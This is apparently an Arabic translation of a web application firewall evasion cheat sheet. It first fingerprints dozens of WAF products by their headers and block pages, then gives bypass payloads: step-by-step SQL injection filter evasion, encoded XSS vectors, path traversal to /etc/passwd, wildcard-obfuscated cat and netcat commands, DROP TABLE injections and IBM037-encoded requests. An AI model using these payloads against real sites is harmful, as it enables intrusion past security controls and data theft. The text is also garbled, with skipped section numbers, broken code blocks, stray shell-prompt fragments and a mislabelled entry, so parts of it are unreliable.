      • نص A safety critical request was discovered and blocked.
Positive Technologies Application Firewall
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على Forbidden في h1 متبوعاً بـ:
    • Request ID: بالتنسيق yyyy-mm-dd-hh-mm-ss-{ref. code}
PowerCDN
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على
      • الترويسة Via بالمحتوى powercdn.com.
      • الترويسة X-Cache بالمحتوى powercdn.com.
      • الترويسة X-CDN بالمحتوى PowerCDN.
Profense
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات Set-Cookie على اسم حقل الكوكيز PLBSID=.
    • تحتوي الترويسة Server على الكلمة المفتاحية Profense.
Proventia (IBM)
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • قد تحتوي صفحة الاستجابة المحظورة على نص request does not match Proventia rules.
Puhui
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية PuhuiWAF.
Qiniu CDN
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى الاستجابة على
      • تحتوي ترويسات الاستجابة على ترويسة غير معتادة X-Qiniu-CDN بالقيمة 0 أو 1.
Radware Appwall
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على النص التالي:
      Unauthorized Activity Has Been Detected. و Case Number
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى البريد الإلكتروني radwarealerting@{site.tld}.
    • تحتوي صفحة الاستجابة المحظورة على العنوان Unauthorized Request Blocked.
    • قد تحتوي ترويسات الاستجابة على اسم حقل الترويسة X-SL-CompState.
Reblaze
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي الكوكيز في ترويسات الاستجابة على اسم حقل الترويسة rbzid=.
    • قد تحتوي قيمة الحقل Server على نص Reblaze Secure Web Gateway.
    • تحتوي صفحة الاستجابة على:
      • Access Denied (403) بالخط العريض.
      • النص Current session has been terminated.
      • For further information, do not hesitate to contact us.
Request Validation Mode
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • جدار حماية موجود تحديداً على مواقع ASP.NET وليس غيرها.
    • تحتوي صفحة الاستجابة على أي من النصوص التالية:
      • ASP.NET has detected data in the request that is potentially dangerous.
      • Request Validation has detected a potentially dangerous client input value.
      • HttpRequestValidationException.
    • رمز الاستجابة المحظورة المُعاد هو دائماً 500 Internal Error.
RSFirewall
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • كلمة مفتاحية COM_RSFIREWALL_403_FORBIDDEN.
      • كلمة مفتاحية COM_RSFIREWALL_EVENT.
Sabre
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يعيد رمز الحالة 500 Internal Error عند الطلبات الضارة.
    • يحتوي محتوى الاستجابة على:
      • البريد الإلكتروني للاتصال [email protected].
      • تحذير بالخط العريض Your request has been blocked.
      • نص clicking the above email link will automatically add some important details to the email for us to investigate the problem.
Safe3
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على:
      • الترويسة X-Powered-By بقيمة الحقل Safe3WAF.
      • تحتوي الترويسة Server على قيمة الحقل Safe3 Web Firewall.
    • تحتوي صفحة الاستجابة على الكلمة المفتاحية Safe3waf.
SafeDog
  • قابلية الكشف: سهلة/متوسطة
  • منهجية الكشف:
    • قد تحتوي الترويسة Server في الاستجابة على:
      • كلمة مفتاحية WAF/2.0.
      • قيمة الحقل safedog.
SecKing
  • قابلية الكشف: سهلة/متوسطة
  • منهجية الكشف:
    • قد تحتوي الترويسة Server في الاستجابة على:
      • كلمة مفتاحية SECKINGWAF.
      • قيمة الحقل SECKING/{version}.
SecuPress
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى الاستجابة على:
      • SecuPress كنص.
      • Block ID: Bad URL Contents كنص.
    • رمز الاستجابة المُعاد هو 503 Service Unavailable.
Secure Entry
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة Secure Entry Server.
SecureIIS
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على أي من النصوص التالية:
      • صورة تعرض شعار beyondtrust.
      • Download SecureIIS Personal Edition
      • مرجع إلى عنوان URL http://www.eeye.com/SecureIIS/.
      • نص SecureIIS Error.
SecureSphere
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على النص التالي:
      • خطأ في نص h2.
      • يحتوي العنوان فقط على النص Error.
      • النص Contact support for additional information..
SEnginx
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على الكلمة المفتاحية SENGINX-ROBOT-MITIGATION.
ServerDefender VP
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي الاستجابة المحظورة على حقل الترويسة X-Pint بالكلمة المفتاحية p80.
Shadow Daemon
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على الكلمة المفتاحية request forbidden by administrative rules..
ShieldSecurity
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص You were blocked by the Shield..
      • نص Something in the URL, Form or Cookie data wasn't appropriate.
      • Warning: You have {number} remaining transgression(s) against this site.
      • Seriously stop repeating what you are doing or you will be locked out.
SiteGround
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على
      النص The page you are trying to access is restricted due to a security rule.
SiteGuard (JP Secure)
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • نص Powered by SiteGuard.
      • نص The server refuse to browse the page..
      • The URL may not be correct. Please confirm the value.
SiteLock TrueShield
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي مصدر صفحة الاستجابة المحظورة على التالي:
      • مرجع إلى عنوان URL www.sitelock.com.
      • النص Sitelock is leader in Business Website Security Services..
      • كلمة مفتاحية sitelock-site-verification.
      • صورة sitelock_shield_logo.
SonicWall
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على قيمة الكلمة المفتاحية SonicWALL.
    • تحتوي صفحة الاستجابة المحظورة على أي من النصوص التالية:
      • صورة تعرض شعار Dell.
      • This request is blocked by the SonicWALL.
      • نص Web Site Blocked.
      • nsa_banner ككلمة مفتاحية. :p
Sophos UTM
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على الكلمة المفتاحية Powered by UTM Web Protection.
SquareSpace
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • رمز الاستجابة المُعاد هو 404 Not Found عند الطلبات الضارة.
    • تحتوي صفحة الاستجابة المحظورة على أي من النصوص التالية:
      • كلمة مفتاحية BRICK-50.
      • نص 404 Not Found.
SquidProxy IDS
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على قيمة الحقل squid/{version}.
    • تحتوي صفحة الاستجابة المحظورة على
      Access control configuration prevents your request from being allowed at this time..
StackPath
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي على صورة تعرض شعار StackPath.
    • تحتوي صفحة الاستجابة المحظورة على
      You performed an action that triggered the service and blocked your request.
Stingray
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • يعيد رمز الاستجابة المحظورة 403 Forbidden أو 500 Internal Error.
    • تحتوي ترويسات الاستجابة على اسم حقل الترويسة X-Mapping.
Sucuri CloudProxy
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على الكلمات المفتاحية Sucuri أو Cloudproxy.
    • تحتوي صفحة الاستجابة المحظورة على النص التالي:
      • النص Access Denied - Sucuri Website Firewall.
      • مرجع إلى عنوان URL https://sucuri.net/privacy-policy.
      • أحياناً البريد الإلكتروني [email protected].
      • يحتوي على إشعار حقوق النشر ;copy {year} Sucuri Inc.
    • تحتوي ترويسات الاستجابة على الترويسة X-Sucuri-ID مع الطلبات العادية.
Synology Cloud
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على النص Copyright (c) 2019 Synology Inc. All rights reserved..
Tencent Cloud
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • يعيد رمز الاستجابة المحظورة خطأ 405 Method Not Allowed.
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى عنوان URL waf.tencent-cloud.com.
Teros
  • قابلية الكشف: صعبة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على حقل الكوكيز st8id.
TrafficShield
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي Server على الكلمة المفتاحية F5-TrafficShield.
    • قد يتم اكتشاف القيمة ASINFO= في كوكيز الاستجابة.
TransIP
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على ترويسة فريدة X-TransIP-Backend.
    • تحتوي ترويسات الاستجابة على ترويسة أخرى X-TransIP-Balancer.
UCloud UEWaf
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي محتوى الاستجابة على:
      • مرجع إلى المسار /uewaf_deny_pages/default/img/ في دليل الرابط.
      • عنوان URL ucloud.cn.
    • تحتوي ترويسات الاستجابة المُعادة على الترويسة Server مضبوطة إلى uewaf/{version}.
URLMaster SecurityCheck
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • قد تحتوي ترويسات الاستجابة على:
      • كلمة مفتاحية UrlMaster.
      • كلمة مفتاحية UrlRewriteModule.
      • كلمة مفتاحية SecurityCheck.
    • نص رمز الاستجابة المحظورة المُعاد هو 400 Bad Request.
URLScan
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على:
      • نص Rejected-by-URLScan.
      • Server Erro in Application كعنوان.
      • Module: IIS Web Core في جدول.
USP Secure Entry
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على قيمة الحقل Secure Entry Server.
Varnish (OWASP)
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • الطلب الضار يُعيد خطأ 404 Not Found.
    • تحتوي صفحة الاستجابة على:
      • نص Request rejected by xVarnish-WAF.
Varnish CacheWall
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • Error 403 Naughty, not Nice! كعنوان.
      • Varnish cache Server كنص.
Viettel
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • صفحة الحظر تحتوي على العنوان Access denied · Viettel WAF.
      • مرجع إلى عنوان URL https://cloudrity.com.vn/.
      • تحتوي صفحة الاستجابة على الكلمات المفتاحية Viettel WAF system.
      • معلومات الاتصال تشير إلى عنوان URL https://cloudrity.com.vn/customer/#/contact.
VirusDie
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على:
      • صورة http://cdn.virusdie.ru/splash/firewallstop.png.
      • إشعار حقوق النشر copy; Virusdie.ru

        .
      • يحتوي عنوان صفحة الاستجابة على الكلمة المفتاحية Virusdie.
      • تحتوي بيانات وصف الصفحة على الكلمة المفتاحية name="FW_BLOCK"
WallArm
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي ترويسات Server على القيمة nginx-wallarm.
WatchGuard IPS
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد تحتوي ترويسات Server على قيمة الحقل WatchGuard.
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص Request denied by WatchGuard Firewall.
      • WatchGuard Technologies Inc. كتذييل.
WebARX Security
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • مقتصر بشكل خاص على مواقع WordPress فقط.
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص This request has been blocked by WebARX Web Application Firewall.
      • مرجع إلى المسار /wp-content/plugins/webarx/ حيث تم تثبيته.
WebKnight
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على الكلمة المفتاحية WebKnight.
    • تحتوي صفحة الاستجابة المحظورة على:
      • تحذير النص WebKnight Application Firewall Alert.
      • نص AQTRONIX WebKnight.
    • رمز الاستجابة المحظورة المُعاد هو 999 No Hacking. :p
    • رمز الاستجابة المحظورة المُعاد هو أيضاً 404 Hack Not Found. :p
WebLand
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية Apache Protected By WebLand WAF.
WebRay
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية WebRay-WAF.
    • قد تحتوي ترويسات الاستجابة على الحقل DrivedBy بالقيمة RaySrv RayEng/{version}.
WebSEAL
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على الكلمة المفتاحية WebSEAL.
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص This is a WebSEAL error message template file.
      • نص WebSEAL server received an invalid HTTP request.
WebTotem
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على The current request was blocked by WebTotem.
West263CDN
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على حقل الترويسة X-Cache بالقيمة WT263CDN.
Wordfence
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على الكلمة المفتاحية WebKnight.
    • تحتوي صفحة الاستجابة المحظورة على:
      • نص Generated by Wordfence.
      • تحذير النص A potentially unsafe operation has been detected in your request to this site.
      • تحذير النص Your access to this site has been limited.
      • نص This response was generated by Wordfence.
WTS-WAF
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • يحتوي عنوان صفحة الاستجابة المحظورة على الكلمة المفتاحية WTS-WAF.
    • تحتوي الترويسة Server على wts كقيمة.
XLabs Security WAF
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي ترويسات الاستجابة على حقل الترويسة X-CDN بالقيمة XLabs Security.
Xuanwudun WAF
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى عنوان URL http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/.
Yunaq Chuangyu
  • قابلية الكشف: متوسطة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة على مرجع إلى:
      • عنوان URL 365cyd.com أو 365cyd.net.
      • مرجع إلى صفحة المساعدة على http://help.365cyd.com/cyd-error-help.html?code=403.
Yundun
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على YUNDUN كقيمة.
    • يحتوي حقل الترويسة X-Cache على YUNDUN كقيمة.
    • تحتوي صفحة الاستجابة على نص Blocked by YUNDUN Cloud WAF.
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى عنوان URL yundun.com/yd_http_error/.
Yunsuo
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على مرجع فئة الصورة إلى yunsuologo.
    • تحتوي ترويسات الاستجابة على اسم الحقل yunsuo_session.
YxLink
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • قد يحتوي الاستجابة على حقل الكوكيز yx_ci_session.
    • قد يحتوي الاستجابة على حقل الكوكيز yx_language.
    • تحتوي الترويسة Server على قيمة الحقل Yxlink-WAF.
ZenEdge
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي صفحة الاستجابة المحظورة على مرجع إلى المسار /__zenedge/assets/.
    • تحتوي الترويسة Server على الكلمة المفتاحية ZENEDGE.
    • قد تحتوي ترويسات الاستجابة المحظورة على الترويسة X-Zen-Fury.
ZScaler
  • قابلية الكشف: سهلة
  • منهجية الكشف:
    • تحتوي الترويسة Server على القيمة ZScaler.
    • تحتوي صفحة الاستجابة المحظورة على:
      • النص Access Denied: Accenture Policy.
      • مرجع إلى عنوان URL https://policies.accenture.com.
      • مرجع إلى الصورة على https://login.zscloud.net/img_logo_new1.png.
      • Your organization has selected Zscaler to protect you from internet threats.
      • The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate.

Fuzzing/Bruteforcing:

الطريقة:

تشغيل مجموعة من الحمولات ضد عنوان URL/النقطة النهائية. بعض قوائم الكلمات المفيدة للفحص العشوائي:

  • Wordlists specifically for fuzzing
    • Seclists/Fuzzing.
    • Fuzz-DB/Attack
    • Other Payloads

التقنية:

  • قم بتحميل قائمة الكلمات في أداة الفحص العشوائي وابدأ الهجوم بالقوة.
  • سجل/احفظ جميع الردود من الحمولات المختلفة التي تم فحصها.
  • استخدم عوامل مستخدم عشوائية، تتراوح من متصفح Chrome على سطح المكتب إلى متصفح iPhone.
  • إذا لوحظ حظر، قم بزيادة تأخير الفحص (مثلاً 2-4 ثواني).
  • استخدم دائماً proxychains، لأن احتمالية حظر عنوان IP الخاص بك حقيقية.

العيوب:

  • غالباً ما تفشل هذه الطريقة.
  • في كثير من الأحيان سيتم حظر عنوان IP الخاص بك (مؤقتاً/دائماً).

Regex Reversing:

الطريقة:

  • الطريقة الأكثر فعالية لتجاوز جدران الحماية لتطبيقات الويب.
  • تعتمد بعض جدران الحماية على مطابقة الحمولات الهجومية مع التوقيعات في قواعد بياناتها.
  • عند تطابق الحمولة مع reg-ex يقوم جدار الحماية بإطلاق إنذار.

التقنيات:

Blacklisting Detection/Bypass

  • في هذه الطريقة نحاول تتبع القواعد خطوة بخطوة من خلال مراقبة الكلمات المفتاحية التي يتم حظرها.
  • الفكرة هي تخمين التعبير المنتظم وصياغة الحمولات التالية التي لا تستخدم الكلمات المفتاحية المحظورة.

الحالة: SQL Injection

• الخطوة 1:

الكلمات المفتاحية المفلترة: and, or, union
التعبير المنتظم المحتمل: preg_match('/(and|or|union)/i', $id)

  • المحاولة المحظورة: union select user, password from users
  • الحقن الملتفى عليه: 1 || (select user from users where user_id = 1) = 'admin'
• الخطوة 2:

الكلمات المفتاحية المفلترة: and, or, union, where

  • المحاولة المحظورة: 1 || (select user from users where user_id = 1) = 'admin'
  • الحقن الملتفى عليه: 1 || (select user from users limit 1) = 'admin'
• الخطوة 3:

الكلمات المفتاحية المفلترة: and, or, union, where, limit

  • المحاولة المحظورة: 1 || (select user from users limit 1) = 'admin'
  • الحقن الملتفى عليه: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
• الخطوة 4:

الكلمات المفتاحية المفلترة: and, or, union, where, limit, group by

  • المحاولة المحظورة: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  • الحقن الملتفى عليه: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• الخطوة 5:

الكلمات المفتاحية المفلترة: and, or, union, where, limit, group by, select

  • المحاولة المحظورة: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • الحقن الملتفى عليه: 1 || 1 = 1 into outfile 'result.txt'
  • الحقن الملتفى عليه: 1 || substr(user,1,1) = 'a'
• الخطوة 6:

الكلمات المفتاحية المفلترة: and, or, union, where, limit, group by, select, '

  • المحاولة المحظورة: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • الحقن الملتفى عليه: 1 || user_id is not null
  • الحقن الملتفى عليه: 1 || substr(user,1,1) = 0x61
  • الحقن الملتفى عليه: 1 || substr(user,1,1) = unhex(61)
• الخطوة 7:

الكلمات المفتاحية المفلترة: and, or, union, where, limit, group by, select, ', hex

  • المحاولة المحظورة: 1 || substr(user,1,1) = unhex(61)
  • الحقن الملتفى عليه: 1 || substr(user,1,1) = lower(conv(11,10,36))
• الخطوة 8:

الكلمات المفتاحية المفلترة: and, or, union, where, limit, group by, select, ', hex, substr

  • المحاولة المحظورة: 1 || substr(user,1,1) = lower(conv(11,10,36))
  • الحقن الملتفى عليه: 1 || lpad(user,7,1)
• الخطوة 9:

الكلمات المفتاحية المفلترة: and, or, union, where, limit, group by, select, ', hex, substr, white space

  • المحاولة المحظورة: 1 || lpad(user,7,1)
  • الحقن الملتفى عليه: 1%0b||%0blpad(user,7,1)

Obfuscation:

الطريقة:

  • ترميز الحمولة بتشفيرات مختلفة (نهج التجربة والخطأ).
  • يمكنك ترميز الحمولة كاملة، أو بعض أجزائها واختبارها بشكل متكرر.

التقنيات:

1. Case Toggling

  • تقوم بعض جدران الحماية ضعيفة التطوير بتصفية حالات أحرف محددة بشكل انتقائي.
  • يمكننا الجمع بين الأحرف الكبيرة والصغيرة لتطوير حمولات فعالة.

العادي: <script>alert()</script>
الملتفى عليه: <ScRipT>alert()</sCRipT>

العادي: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
الملتفى عليه: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL Encoding

  • ترميز الحمولات العادية باستخدام ترميز %/ترميز URL.
  • يمكن القيام بذلك باستخدام أدوات عبر الإنترنت مثل هذه.
  • يتضمن Burp مشفر/مفكك تشفير مدمج.

محظور: <svG/x=">"/oNloaD=confirm()//
ملتفى عليه: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

محظور: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
ملتفى عليه: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode Normalization

  • توفر أحرف ASCII بتشفير اليونيكود متغيرات رائعة للتجاوز.
  • يمكنك ترميز الحمولة كاملة/جزئياً للحصول على النتائج.

العادي: <marquee onstart=prompt()>
ملتفى عليه: <marquee onstart=\u0070r\u06f\u006dpt()>

محظور: /?redir=http://google.com
ملتفى عليه: /?redir=http://google。com (بديل يونيكود)

محظور: <marquee loop=1 onfinish=alert()>x
ملتفى عليه: <marquee loop=1 onfinish=alert︵1)>x (بديل يونيكود)

نصيحة: ألق نظرة على هذا وهذا التقريرين على HackerOne. :)

العادي: ../../etc/passwd
ملتفى عليه: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd

4. HTML Representation

  • غالباً ما تقوم تطبيقات الويب بترميز الأحرف الخاصة إلى ترميز HTML وتقديمها وفقاً لذلك.
  • وهذا يقودنا إلى حالات تجاوز أساسية باستخدام ترميز HTML (رقمي/عام).

العادي: ">
مشفر: &quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; (الصيغة العامة)
مشفر: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (المرجع الرقمي)

5. Mixed Encoding

  • أحياناً، تميل قواعد جدران الحماية إلى تصفية نوع معين من الترميز.
  • يمكن تجاوز هذا النوع من المرشحات باستخدام حمولات مشفرة بشكل مختلط.
  • تضفي علامات التبويب والأسطر الجديدة مزيداً من التعتيم.

ملتفى عليه:``` XSS

root@kitploit:~
__6. استخدام التعليقات__
- التعليقات تخفي متجهات الحمولة النمطية.
- الحمولات المختلفة لها طرق مختلفة للتعتيم.

__محظور__: `<script>alert()</script>`  
__تم تجاوزه__: `<!--><script>alert/**/()/**/</script>`

__محظور__: `/?id=1+union+select+1,2,3--`  
__تم تجاوزه__: `/?id=1+un/**/ion+sel/**/ect+1,2,3--`

__7. الترميز المزدوج__
- غالبًا ما تقوم عوامل تصفية WAF بترميز الأحرف لمنع الهجمات.
- ومع ذلك، يمكن تجاوز المرشحات ضعيفة التطوير (بدون مرشحات عودية) باستخدام الترميز المزدوج.

__قياسي__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`  
__مُعمى__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`

__قياسي__: `<script>alert()</script>`  
__مُعمى__: `%253Cscript%253Ealert()%253C%252Fscript%253E`

__8. التعتيم باستخدام الأحرف البديلة__
- تستخدم أدوات سطر الأوامر المختلفة أنماط الغلوب للتعامل مع ملفات متعددة.
- يمكننا تعديلها لتنفيذ أوامر النظام.
- خاصة بثغرات تنفيذ التعليمات البرمجية عن بُعد على أنظمة لينكس.

__قياسي__: `/bin/cat /etc/passwd`  
__مُعمى__: `/???/??t /???/??ss??`  
الأحرف المستخدمة: `/ ? t s`

__قياسي__: `/bin/nc 127.0.0.1 1337`  
__مُعمى__: `/???/n? 2130706433 1337`  
الأحرف المستخدمة: `/ ? n [0-9]`

__9. توليد الحمولة الديناميكي__
- لغات البرمجة المختلفة لها صيغ وأنماط مختلفة للربط.
- يسمح لنا ذلك بتوليد حمولات فعالة يمكنها تجاوز العديد من المرشحات والقواعد.

__قياسي__: `<script>alert()</script>`  
__مُعمى__: `<script>eval('al'+'er'+'t()')</script>`

__قياسي__: `/bin/cat /etc/passwd`  
__مُعمى__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
> يسمح Bash بربط المسارات للتنفيذ.

__قياسي__: ``  
__مشوش__:```

13. فواصل الرموز

  • الهجمات على محللات الرموز تحاول كسر منطق تقسيم الطلب إلى رموز بمساعدة فواصل الرموز.

  • فواصل الرموز هي رموز تسمح بالتأثير على التطابق بين عنصر سلسلة ورموز معينة، وبالتالي تجاوز البحث عن التواقيع.

  • ومع ذلك، يجب أن يظل الطلب صالحًا أثناء استخدام فواصل الرموز.

  • حالة: رمز غير معروف لمحلل الرموز

    • الحمولة: ?id=‘-sqlite_version() UNION SELECT password FROM users --
  • حالة: سياق غير معروف للمحلل (لاحظ القوس غير المضمن)

    • الحمولة 1: ?id=123);DROP TABLE users --
    • الحمولة 2: ?id=1337) INTO OUTFILE ‘xxx’ --

نصيحة: يمكن صياغة المزيد من الحمولات عبر ورقة الغش.

14. التمويه في صيغ أخرى

  • تطبيقات الويب العديدة تدعم أنواع ترميز مختلفة ويمكنها تفسير الترميز (انظر أدناه).
  • تمويه حمولتنا بصيغة لا تدعمها جدار الحماية للتطبيقات الويب (WAF) ولكن الخادم يمكن أن يهرب حمولتنا.

حالة: IIS

  • IIS6، 7.5، 8 و 10 (ASPX v4.x) تسمح بتفسيرات أحرف IBM037.
  • يمكننا ترميز حمولتنا وإرسال المعاملات المشفرة مع الاستعلام.

الطلب الأصلي:

root@kitploit:~
GET http://victim.com/products?id=1

POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41

id2='union all select * from users--

root@kitploit:~
الطلب المُشفر + ترميز URL:```
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

يوضح الجدول التالي دعم ترميزات الأحرف المختلفة على الأنظمة التي تم اختبارها (عندما يمكن إخفاء الرسائل باستخدامها):

تلميح: يمكنك استخدام هذا النص البرمجي الصغير بلغة بايثون لتحويل حمولاتك ومعاملاتك إلى الترميزات التي تريدها.

الهدفالترميزاتملاحظات
Nginx, uWSGI-Django-Python3IBM037، IBM500، cp875، IBM1026، IBM273
  • يجب ترميز سلسلة الاستعلام والنص الأساسي.
  • المعلمات المفكوك ترميزها في عنوان URL في سلسلة الاستعلام والنص الأساسي.
  • يجب ترميز علامة التساوي وعلامة العطف أيضًا (بدون فك ترميز URL).
Nginx, uWSGI-Django-Python2IBM037، IBM500، cp875، IBM1026، utf-16، utf-32، utf-32BE، IBM424
  • يجب ترميز سلسلة الاستعلام والنص الأساسي.
  • يتم فك ترميز URL للمعلمات في سلسلة الاستعلام والنص الأساسي بعد ذلك.
  • يجب ألا يتم ترميز علامة التساوي وعلامة العطف بأي شكل من الأشكال.
Apache-TOMCAT8-JVM1.8-JSPIBM037، IBM500، IBM870، cp875، IBM1026، IBM01140، IBM01141، IBM01142، IBM01143، IBM01144، IBM01145، IBM01146، IBM01147، IBM01148، IBM01149، ``````

Read more